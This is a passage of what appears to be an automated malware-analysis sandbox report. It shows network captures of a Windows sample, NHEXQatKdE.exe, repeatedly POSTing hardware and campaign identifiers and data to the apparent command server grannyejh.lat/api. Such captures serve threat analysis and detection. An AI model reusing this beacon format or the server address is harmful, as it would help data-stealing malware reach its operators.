                                                                                                                                    2024-12-18 20:22:35 UTC342INData Raw: 34 64 61 0d 0a 36 51 64 71 39 4f 57 50 72 52 47 71 42 56 54 38 4d 79 50 4e 70 4a 62 63 4e 35 6b 46 37 4a 76 39 43 51 38 78 64 6f 4a 6a 33 38 4f 53 4a 52 7a 57 33 37 75 42 4d 39 6c 67 64 73 5a 48 55 62 6a 42 75 76 35 57 2f 53 66 57 2f 5a 78 6c 66 46 52 61 6f 42 57 79 34 64 4e 68 43 35 69 57 36 6f 45 7a 7a 33 31 32 78 6d 68 59 37 38 48 34 2f 67 32 37 59 49 62 35 6e 47 56 74 55 42 33 74 45 37 4f 67 67 57 73 4e 6e 49 44 73 79 58 44 47 61 44 47 5a 56 6b 4b 6e 79 76 2b 78 58 2f 51 6e 77 4c 6d 59 63 79 30 4c 56 4d 38 47 71 36 4b 6b 5a 68 6d 66 78 2f 4b 42 61 6f 68 67 4f 74 34 4a 41 61 7a 42 39 4c 42 52 2f 57 36 45 38 35 56 74 62 46 55 63 38 67 71 35 71 34 46 6c 44 70 32 4b 35 64 31 39 7a 47 38 36 6e 31 78 43 37 34 69 30 75 55 32 37 50 38 36 71 72 57 68 38 51 67
                                                                                                                                    Data Ascii: 4da6Qdq9OWPrRGqBVT8MyPNpJbcN5kF7Jv9CQ8xdoJj38OSJRzW37uBM9lgdsZHUbjBuv5W/SfW/ZxlfFRaoBWy4dNhC5iW6oEzz312xmhY78H4/g27YIb5nGVtUB3tE7OggWsNnIDsyXDGaDGZVkKnyv+xX/QnwLmYcy0LVM8Gq6KkZhmfx/KBaohgOt4JAazB9LBR/W6E85VtbFUc8gq5q4FlDp2K5d19zG86n1xC74i0uU27P86qrWh8Qg
                                                                                                                                    2024-12-18 20:22:35 UTC907INData Raw: 41 61 78 34 64 4d 6c 44 70 69 47 34 4d 39 68 77 47 77 39 6d 30 4e 4b 70 73 76 35 76 6c 6a 78 61 49 33 35 6d 47 46 6e 58 42 37 6b 44 4c 43 6e 69 32 56 49 32 4d 66 71 31 7a 4f 51 4a 78 57 62 51 55 61 6a 30 4c 61 45 46 65 51 70 6c 37 6d 59 5a 79 30 4c 56 4f 67 45 76 71 4b 41 61 67 75 65 6a 50 2f 50 59 63 35 71 4d 34 78 58 52 4b 48 4d 39 36 78 66 39 57 47 4e 38 4a 52 69 61 46 51 51 6f 45 2f 39 70 70 4d 6c 55 4e 61 6d 34 4d 52 2f 77 6e 41 32 33 6b 34 50 74 6f 62 7a 73 68 57 6a 4a 34 72 34 6d 32 70 70 58 52 72 6b 44 62 75 76 68 6d 6f 4f 6e 49 66 71 78 58 76 41 5a 6a 75 56 58 6b 47 71 79 2f 43 34 57 66 70 69 7a 72 66 66 62 48 55 54 54 4b 41 76 75 71 4b 5a 4a 7a 32 56 69 65 50 49 5a 59 68 34 65 49 63 52 52 71 4f 47 72 50 35 62 2f 6d 69 63 2b 49 31 75 59 30 45 59
                                                                                                                                    Data Ascii: Aax4dMlDpiG4M9hwGw9m0NKpsv5vljxaI35mGFnXB7kDLCni2VI2Mfq1zOQJxWbQUaj0LaEFeQpl7mYZy0LVOgEvqKAaguejP/PYc5qM4xXRKHM96xf9WGN8JRiaFQQoE/9ppMlUNam4MR/wnA23k4PtobzshWjJ4r4m2ppXRrkDbuvhmoOnIfqxXvAZjuVXkGqy/C4WfpizrffbHUTTKAvuqKZJz2ViePIZYh4eIcRRqOGrP5b/mic+I1uY0EY
                                                                                                                                    2024-12-18 20:22:35 UTC1369INData Raw: 34 34 34 32 0d 0a 57 48 35 38 46 38 77 6d 38 2b 6e 6c 78 41 70 4d 37 79 73 31 37 30 61 49 6e 78 6e 47 64 6f 58 68 65 67 54 2f 32 6d 6b 79 56 51 31 71 4c 6a 7a 47 4c 5a 4a 51 4f 64 58 30 2b 6f 30 4c 53 68 47 2b 49 6e 69 66 58 66 4d 79 31 5a 45 2b 63 46 73 4b 75 49 59 51 79 62 69 4f 54 47 65 74 70 74 4f 70 42 44 54 4b 58 44 2b 72 4a 51 39 47 65 50 2b 4a 46 68 5a 68 4e 61 6f 41 61 6c 34 64 4d 6c 4a 35 75 58 2f 38 56 34 32 53 55 44 6e 56 39 50 71 4e 43 30 6f 52 76 69 4a 34 6e 31 33 7a 4d 74 57 42 4c 73 44 62 32 6e 6d 57 73 48 68 49 33 2f 79 33 33 4d 61 7a 69 58 58 45 36 71 31 50 43 2b 52 2f 70 69 69 66 65 53 65 57 67 54 57 71 41 47 70 65 48 54 4a 54 4b 69 67 50 33 65 64 49 70 53 4e 5a 42 66 52 72 6d 47 36 2f 42 4d 75 32 43 43 75 63 63 72 62 6c 38 5a 36 51 53
                                                                                                                                    Data Ascii: 4442WH58F8wm8+nlxApM7ys170aInxnGdoXhegT/2mkyVQ1qLjzGLZJQOdX0+o0LShG+InifXfMy1ZE+cFsKuIYQybiOTGetptOpBDTKXD+rJQ9GeP+JFhZhNaoAal4dMlJ5uX/8V42SUDnV9PqNC0oRviJ4n13zMtWBLsDb2nmWsHhI3/y33MaziXXE6q1PC+R/piifeSeWgTWqAGpeHTJTKigP3edIpSNZBfRrmG6/BMu2CCuccrbl8Z6QS
                                                                                                                                    2024-12-18 20:22:35 UTC1369INData Raw: 56 44 57 6a 66 2f 4b 66 63 78 74 4d 35 70 64 53 36 2f 44 35 72 5a 54 2f 47 75 47 2f 4a 42 74 61 46 34 54 36 77 4b 76 73 34 68 68 42 70 72 48 6f 34 39 30 30 43 64 75 33 6e 52 57 72 4e 62 79 76 52 58 6b 4b 5a 65 35 6d 47 63 74 43 31 54 67 44 37 47 71 6a 47 34 44 6b 6f 50 74 77 6e 6a 47 61 54 2b 53 57 55 32 6f 31 50 6d 37 58 66 46 75 69 2f 57 53 61 48 39 51 46 61 42 50 2f 61 61 54 4a 56 44 57 6f 4e 37 34 55 49 68 34 65 49 63 52 52 71 4f 47 72 50 35 55 38 32 43 41 2f 59 31 6c 66 31 30 54 34 41 65 31 71 59 78 70 42 70 69 56 35 63 35 7a 78 6d 67 2b 6c 31 56 41 71 38 4c 34 75 52 57 31 4a 34 6e 68 33 7a 4d 74 65 78 66 36 47 2f 2b 50 67 47 55 50 68 70 48 32 6a 32 79 47 66 6e 61 5a 58 51 48 33 68 76 43 31 58 2f 4a 6b 68 2f 32 53 61 32 52 63 48 65 67 4d 74 62 4f 4b
                                                                                                                                    Data Ascii: VDWjf/KfcxtM5pdS6/D5rZT/GuG/JBtaF4T6wKvs4hhBprHo4900Cdu3nRWrNbyvRXkKZe5mGctC1TgD7GqjG4DkoPtwnjGaT+SWU2o1Pm7XfFui/WSaH9QFaBP/aaTJVDWoN74UIh4eIcRRqOGrP5U82CA/Y1lf10T4Ae1qYxpBpiV5c5zxmg+l1VAq8L4uRW1J4nh3zMtexf6G/+PgGUPhpH2j2yGfnaZXQH3hvC1X/Jkh/2Sa2RcHegMtbOK
                                                                                                                                    2024-12-18 20:22:35 UTC1369INData Raw: 58 71 77 33 6e 48 5a 44 36 54 55 6b 6d 39 78 76 6d 2b 52 2b 6c 68 68 66 66 66 4a 53 31 55 44 4b 42 5a 2f 5a 43 63 62 6b 69 4a 79 66 53 50 64 4d 51 6e 62 74 35 53 53 36 4c 49 35 72 70 54 38 47 53 41 38 5a 70 6a 61 56 6b 5a 37 77 71 33 71 49 4e 6c 42 35 4f 50 35 73 6c 39 79 57 45 36 6b 78 45 50 37 38 48 73 2f 67 32 37 51 4a 54 30 6d 58 78 38 5a 68 50 67 55 50 32 2b 78 58 78 49 6b 59 75 74 6c 7a 50 46 61 7a 79 54 56 45 57 6e 77 66 65 2f 57 66 39 71 67 2f 32 57 62 32 68 42 42 75 59 50 76 61 36 46 61 67 53 45 69 65 6a 50 66 34 67 70 64 70 6c 4a 41 66 65 47 78 61 6c 56 75 33 6a 41 34 4e 39 73 59 52 4e 4d 6f 41 36 77 73 34 64 71 43 4a 65 45 36 63 52 30 7a 6d 45 33 6e 56 52 43 71 73 44 31 76 6c 6e 78 59 49 62 7a 6b 57 5a 72 56 78 4c 6d 51 66 50 68 6a 48 31 49 7a
                                                                                                                                    Data Ascii: Xqw3nHZD6TUkm9xvm+R+lhhfffJS1UDKBZ/ZCcbkiJyfSPdMQnbt5SS6LI5rpT8GSA8ZpjaVkZ7wq3qINlB5OP5sl9yWE6kxEP78Hs/g27QJT0mXx8ZhPgUP2+xXxIkYutlzPFazyTVEWnwfe/Wf9qg/2Wb2hBBuYPva6FagSEiejPf4gpdplJAfeGxalVu3jA4N9sYRNMoA6ws4dqCJeE6cR0zmE3nVRCqsD1vlnxYIbzkWZrVxLmQfPhjH1Iz
                                                                                                                                    2024-12-18 20:22:35 UTC1369INData Raw: 39 7a 47 41 32 6b 6c 35 47 70 38 6e 77 76 6c 71 37 4b 63 37 2b 68 79 73 31 45 7a 54 72 46 35 79 76 67 48 64 49 69 63 6e 30 6a 33 54 45 4a 32 37 65 58 30 69 75 7a 76 71 79 58 66 39 31 6a 76 4b 57 5a 47 78 63 46 4f 4d 41 74 36 6d 5a 59 77 69 64 6a 2b 72 48 64 38 5a 31 4e 35 45 52 44 2b 2f 42 37 50 34 4e 75 31 61 59 2f 70 68 6b 4c 33 6f 54 2b 77 43 33 6f 6f 42 70 53 49 6e 4a 39 49 39 30 78 43 64 75 33 6c 78 4e 6f 73 4c 6d 73 6c 58 37 62 6f 6e 7a 6a 57 52 69 58 68 66 67 42 4b 2b 67 6d 57 6f 44 6b 34 54 70 77 48 7a 45 62 7a 7a 65 48 77 47 6f 33 72 54 6d 46 64 64 6b 6e 2f 50 64 54 48 64 46 45 2b 77 51 74 71 79 48 4a 52 66 59 6e 71 33 49 66 34 67 2f 64 70 35 51 54 4c 33 44 39 62 52 66 39 6d 2b 42 2f 4a 70 6b 61 56 63 66 37 68 4f 7a 72 6f 74 6a 41 35 65 43 37 73
                                                                                                                                    Data Ascii: 9zGA2kl5Gp8nwvlq7Kc7+hys1EzTrF5yvgHdIicn0j3TEJ27eX0iuzvqyXf91jvKWZGxcFOMAt6mZYwidj+rHd8Z1N5ERD+/B7P4Nu1aY/phkL3oT+wC3ooBpSInJ9I90xCdu3lxNosLmslX7bonzjWRiXhfgBK+gmWoDk4TpwHzEbzzeHwGo3rTmFddkn/PdTHdFE+wQtqyHJRfYnq3If4g/dp5QTL3D9bRf9m+B/JpkaVcf7hOzrotjA5eC7s
                                                                                                                                    2024-12-18 20:22:35 UTC1369INData Raw: 4f 35 56 56 53 4b 72 4f 39 37 74 51 38 57 75 43 2b 4a 64 69 5a 31 59 52 35 67 75 2b 72 34 52 6b 42 4a 4b 4f 34 38 59 7a 68 69 63 78 68 68 45 5a 37 2f 44 6b 75 55 33 32 64 38 7a 4c 6e 48 70 38 52 68 6e 77 42 2f 2b 4f 69 47 6b 4c 6b 34 44 39 6a 32 79 47 66 6e 61 5a 58 51 48 33 68 76 53 36 57 66 68 67 67 50 61 53 5a 47 70 59 47 2b 6f 50 72 36 36 4f 62 51 53 65 69 76 2f 46 65 64 70 75 50 35 4e 66 53 62 33 46 74 50 41 56 2f 48 2f 4f 6f 64 39 5a 5a 31 41 59 39 67 79 79 34 5a 51 72 45 64 61 41 34 59 38 72 69 48 55 6b 6e 6c 70 42 71 4d 6a 6d 76 31 33 30 62 59 37 2f 6c 47 46 75 57 68 44 75 43 4c 75 67 68 6d 51 4a 6c 6f 4c 74 78 6d 48 46 4a 33 6a 65 56 6c 6e 76 6e 72 53 4a 57 66 42 57 6a 65 2f 66 64 43 4e 4b 56 4f 63 4e 2f 66 6e 4c 5a 42 71 62 6a 2b 6e 50 66 73 35
                                                                                                                                    Data Ascii: O5VVSKrO97tQ8WuC+JdiZ1YR5gu+r4RkBJKO48YzhicxhhEZ7/DkuU32d8zLnHp8RhnwB/+OiGkLk4D9j2yGfnaZXQH3hvS6WfhggPaSZGpYG+oPr66ObQSeiv/FedpuP5NfSb3FtPAV/H/Ood9ZZ1AY9gyy4ZQrEdaA4Y8riHUknlpBqMjmv130bY7/lGFuWhDuCLughmQJloLtxmHFJ3jeVlnvnrSJWfBWje/fdCNKVOcN/fnLZBqbj+nPfs5
                                                                                                                                    2024-12-18 20:22:35 UTC1369INData Raw: 52 50 68 68 75 62 2b 44 62 73 67 6a 65 75 4e 62 57 35 46 46 36 63 2f 67 34 47 41 63 77 6d 62 6a 4f 48 78 54 64 31 6b 4f 4a 42 57 56 37 36 47 75 76 35 61 75 7a 2b 33 75 64 63 72 55 68 31 55 2b 45 48 6c 34 62 35 6d 42 70 69 41 2b 39 34 2b 36 47 77 67 6e 31 78 4b 6f 34 54 31 73 30 58 38 4a 38 43 35 6d 53 73 31 41 31 71 67 42 61 7a 68 30 7a 56 61 7a 64 4b 2b 6d 43 4f 61 65 48 69 48 45 56 66 76 6e 71 62 77 46 65 6b 6e 31 72 6e 59 61 48 39 42 45 75 4d 58 76 75 61 31 57 79 69 64 69 2b 37 44 63 73 38 6e 65 4e 35 65 41 66 66 2f 74 4c 31 48 36 53 69 66 37 35 4a 37 61 68 38 63 38 51 79 78 34 63 55 6c 52 4a 4b 4d 34 63 70 30 32 43 67 6b 6a 6c 70 4e 75 59 72 77 72 42 57 31 4a 35 2f 79 6b 48 6c 6a 56 46 76 78 46 37 43 78 69 47 41 50 32 6f 2f 38 77 6e 2b 49 4b 58 61 4c
                                                                                                                                    Data Ascii: RPhhub+DbsgjeuNbW5FF6c/g4GAcwmbjOHxTd1kOJBWV76Guv5auz+3udcrUh1U+EHl4b5mBpiA+94+6Gwgn1xKo4T1s0X8J8C5mSs1A1qgBazh0zVazdK+mCOaeHiHEVfvnqbwFekn1rnYaH9BEuMXvua1Wyidi+7Dcs8neN5eAff/tL1H6Sif75J7ah8c8Qyx4cUlRJKM4cp02CgkjlpNuYrwrBW1J5/ykHljVFvxF7CxiGAP2o/8wn+IKXaL
                                                                                                                                    2024-12-18 20:22:35 UTC1369INData Raw: 62 6c 74 46 4b 33 4c 38 4c 6f 6a 47 56 6d 52 52 4f 67 50 76 50 68 6b 79 56 51 31 72 4c 75 77 58 33 50 63 53 66 54 64 30 4b 6f 77 50 65 77 51 75 6f 6e 77 4c 6d 5a 4b 7a 55 42 57 71 41 46 72 4f 48 54 4e 56 72 4e 30 72 36 59 49 35 70 34 65 49 63 52 56 2b 2b 65 70 2f 41 56 36 53 66 57 75 64 68 6c 59 46 49 58 37 67 4b 76 73 34 31 6d 48 70 58 41 30 2f 46 57 78 57 6f 7a 6b 46 5a 2f 6b 65 66 2b 72 6c 6a 30 59 4c 44 48 71 48 70 71 51 31 62 47 41 71 75 69 79 79 74 49 6a 73 65 31 6a 31 4c 43 64 7a 75 52 56 67 48 68 68 76 44 2b 44 62 74 43 67 2f 53 61 5a 57 6f 52 4e 65 6f 52 73 4b 36 4d 4a 55 62 57 69 36 32 58 4d 38 6c 74 4a 70 4e 65 52 75 50 42 37 72 6b 56 74 53 65 41 75 63 63 72 62 46 6b 45 37 51 36 36 37 59 31 72 42 74 61 59 6f 39 59 7a 33 69 64 75 7a 52 38 42 76
                                                                                                                                    Data Ascii: bltFK3L8LojGVmRROgPvPhkyVQ1rLuwX3PcSfTd0KowPewQuonwLmZKzUBWqAFrOHTNVrN0r6YI5p4eIcRV++ep/AV6SfWudhlYFIX7gKvs41mHpXA0/FWxWozkFZ/kef+rlj0YLDHqHpqQ1bGAquiyytIjse1j1LCdzuRVgHhhvD+DbtCg/SaZWoRNeoRsK6MJUbWi62XM8ltJpNeRuPB7rkVtSeAuccrbFkE7Q667Y1rBtaYo9Yz3iduzR8Bv


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.649739172.67.179.1094434156C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-18 20:22:37 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=4NI2IDMEIU881EW
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 12846
                                                                                                                                    Host: grannyejh.lat
                                                                                                                                    2024-12-18 20:22:37 UTC12846OUTData Raw: 2d 2d 34 4e 49 32 49 44 4d 45 49 55 38 38 31 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 32 33 39 37 41 32 43 44 44 30 33 31 46 31 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 34 4e 49 32 49 44 4d 45 49 55 38 38 31 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 4e 49 32 49 44 4d 45 49 55 38 38 31 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d
                                                                                                                                    Data Ascii: --4NI2IDMEIU881EWContent-Disposition: form-data; name="hwid"782397A2CDD031F1C683EA0F4CB0333A--4NI2IDMEIU881EWContent-Disposition: form-data; name="pid"2--4NI2IDMEIU881EWContent-Disposition: form-data; name="lid"yau6Na--7911731954--
                                                                                                                                    2024-12-18 20:22:53 UTC1036INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 18 Dec 2024 20:22:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=i9vofkpvsir278gq12dn54o7s4; expires=Sun, 13-Apr-2025 14:09:19 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zgui77EZZa%2FgC9C5GEknASTNs4qpjU96ny2WhWWKf4KoZnJwKEbG4tv1sPFvk5T2S%2FJdaBKekEeob1TdQY%2FtmatW3gEgfk0oKtWVJsWLUvO5C7bmoQ9vnX1elTm3A35%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f41ddb29ee442b7-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1638&rtt_var=623&sent=13&recv=17&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13780&delivery_rate=1745367&cwnd=212&unsent_bytes=0&cid=5d88a1f6b7cb8892&ts=16906&x=0"
                                                                                                                                    2024-12-18 20:22:53 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2024-12-18 20:22:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.649780172.67.179.1094434156C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-18 20:22:55 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=4DEKY6HNPIRCH
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 15080
                                                                                                                                    Host: grannyejh.lat
                                                                                                                                    2024-12-18 20:22:55 UTC15080OUTData Raw: 2d 2d 34 44 45 4b 59 36 48 4e 50 49 52 43 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 32 33 39 37 41 32 43 44 44 30 33 31 46 31 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 34 44 45 4b 59 36 48 4e 50 49 52 43 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 44 45 4b 59 36 48 4e 50 49 52 43 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d 34 44 45 4b 59 36
                                                                                                                                    Data Ascii: --4DEKY6HNPIRCHContent-Disposition: form-data; name="hwid"782397A2CDD031F1C683EA0F4CB0333A--4DEKY6HNPIRCHContent-Disposition: form-data; name="pid"2--4DEKY6HNPIRCHContent-Disposition: form-data; name="lid"yau6Na--7911731954--4DEKY6
                                                                                                                                    2024-12-18 20:22:56 UTC1029INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 18 Dec 2024 20:22:55 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=n2esmemgdb28fj7qoesto6k4q5; expires=Sun, 13-Apr-2025 14:09:34 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mAHqpFqB3Qlqdqc7jtzEhfv6rSd2jY56y1okfRRfEbH3kUOk4iP6Jn39jQqsMOq%2FZAQewdGLnuO6wjH3BC5MTGvYPs9EhqI8igvSFw1Qti1PuuTExdufOlmL5CcPTl%2B3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f41de243948426d-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1597&rtt_var=617&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2830&recv_bytes=16012&delivery_rate=1748502&cwnd=227&unsent_bytes=0&cid=ff120328809a4bbe&ts=844&x=0"
                                                                                                                                    2024-12-18 20:22:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2024-12-18 20:22:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.649787172.67.179.1094434156C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-18 20:22:57 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=3BT56OA3
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 19908
                                                                                                                                    Host: grannyejh.lat
                                                                                                                                    2024-12-18 20:22:57 UTC15331OUTData Raw: 2d 2d 33 42 54 35 36 4f 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 32 33 39 37 41 32 43 44 44 30 33 31 46 31 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 33 42 54 35 36 4f 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 42 54 35 36 4f 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d 33 42 54 35 36 4f 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                    Data Ascii: --3BT56OA3Content-Disposition: form-data; name="hwid"782397A2CDD031F1C683EA0F4CB0333A--3BT56OA3Content-Disposition: form-data; name="pid"3--3BT56OA3Content-Disposition: form-data; name="lid"yau6Na--7911731954--3BT56OA3Content-Dis
                                                                                                                                    2024-12-18 20:22:57 UTC4577OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5 f6
                                                                                                                                    Data Ascii: 2+?2+?o?Mp5p_oI
                                                                                                                                    2024-12-18 20:23:01 UTC1035INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 18 Dec 2024 20:23:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=773jeogg0ih930solclo3kt1s4; expires=Sun, 13-Apr-2025 14:09:37 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPiNBT%2F5FeytaVpL8i0T8G%2FusPfDAOBCe7PVXvcJAx1qtvHtVNv5aKx6ViIokmM2vPYALiAT%2BSKZ3dH82AVTbLCnMbza15vc7hkHbt%2BsogogCAYgzQs%2BU2UcIoneP3yu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f41de34bf3d18ee-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=24&recv=28&lost=0&retrans=1&sent_bytes=4198&recv_bytes=20857&delivery_rate=28897&cwnd=144&unsent_bytes=0&cid=e3826eaf9086e069&ts=4274&x=0"
                                                                                                                                    2024-12-18 20:23:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2024-12-18 20:23:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.649799172.67.179.1094434156C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    TimestampBytes transferredDirectionData
